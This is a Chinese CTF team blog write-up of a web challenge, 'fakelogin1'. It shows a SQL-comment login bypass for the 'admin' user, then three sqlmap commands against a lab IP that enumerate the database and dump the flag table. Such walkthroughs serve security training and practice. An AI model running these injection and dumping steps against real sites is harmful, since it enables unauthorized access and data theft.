Home
Archives
Tags
About Me
N1CTF2018
强网杯2018
TCTF2018
红帽杯2018
MatesCTF2018
网鼎杯
Rctf2019
Defcon quals2019
Starctf2019
DragonCTF2018
护网杯2018
新生赛2018
TCTF2019
SquareCTF2018
LCTF2018
XNUCA2018
QWB2019
ciscn2019 Final
XNUCA2019
ByteCTF2019
Codegate2020
QWB2020
钓鱼城杯2020
XCTF华为云专场2020
红帽杯2021
2021广东大学生
CISCN2021
羊城杯2021
第五空间2021

Previous post Next post Back to top Share post

[Web]fakelogin1

xp0int Posted on Oct 28 2018

(比赛题目可能有改动，做法没变)
首先一个登陆页面
![title](https://leanote.com/api/file/getImage?fileId=5bd560c4ab64417dd60027fb)
猜用户：
admin
用’#尝试绕过
![title](https://leanote.com/api/file/getImage?fileId=5bd560cdab64417fbe0027d7)
或直接绕过：
![title](https://leanote.com/api/file/getImage?fileId=5bd560d5ab64417fbe0027d9)
都能登陆。

![title](https://leanote.com/api/file/getImage?fileId=5bd560e2ab64417dd6002803)
登陆后跳转到sqldebug.php，有uid参数。
简单测试：
![title](https://leanote.com/api/file/getImage?fileId=5bd560efab64417dd6002808)
![title](https://leanote.com/api/file/getImage?fileId=5bd560faab64417fbe0027e0)

使用sqlmap（用自己的cookie）：
sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' –dbs
![title](https://leanote.com/api/file/getImage?fileId=5bd56113ab64417dd6002817)

sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 –tables
![title](https://leanote.com/api/file/getImage?fileId=5bd5611cab64417fbe0027ec)

sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 -T fffflllaaaaagggggg369 –dump
![title](https://leanote.com/api/file/getImage?fileId=5bd56126ab64417dd600281f)

打赏还是打残，这是个问题

Wechat Pay

Alipay

[Web]easy web

[Misc]bitcoin_base

立即登录, 发表评论.
没有帐号? 立即注册

0 条评论

More...

Home
Archives
Tags
About Me
N1CTF2018
强网杯2018
TCTF2018
红帽杯2018
MatesCTF2018
网鼎杯
Rctf2019
Defcon quals2019
Starctf2019
DragonCTF2018
护网杯2018
新生赛2018
TCTF2019
SquareCTF2018
LCTF2018
XNUCA2018
QWB2019
ciscn2019 Final
XNUCA2019
ByteCTF2019
Codegate2020
QWB2020
钓鱼城杯2020
XCTF华为云专场2020
红帽杯2021
2021广东大学生
CISCN2021
羊城杯2021
第五空间2021

TOC
Share
Top
Menu

Home
Archives
Tags
About Me
N1CTF2018
强网杯2018
TCTF2018
红帽杯2018
MatesCTF2018
网鼎杯
Rctf2019
Defcon quals2019
Starctf2019
DragonCTF2018
护网杯2018
新生赛2018
TCTF2019
SquareCTF2018
LCTF2018
XNUCA2018
QWB2019
ciscn2019 Final
XNUCA2019
ByteCTF2019
Codegate2020
QWB2020
钓鱼城杯2020
XCTF华为云专场2020
红帽杯2021
2021广东大学生
CISCN2021
羊城杯2021
第五空间2021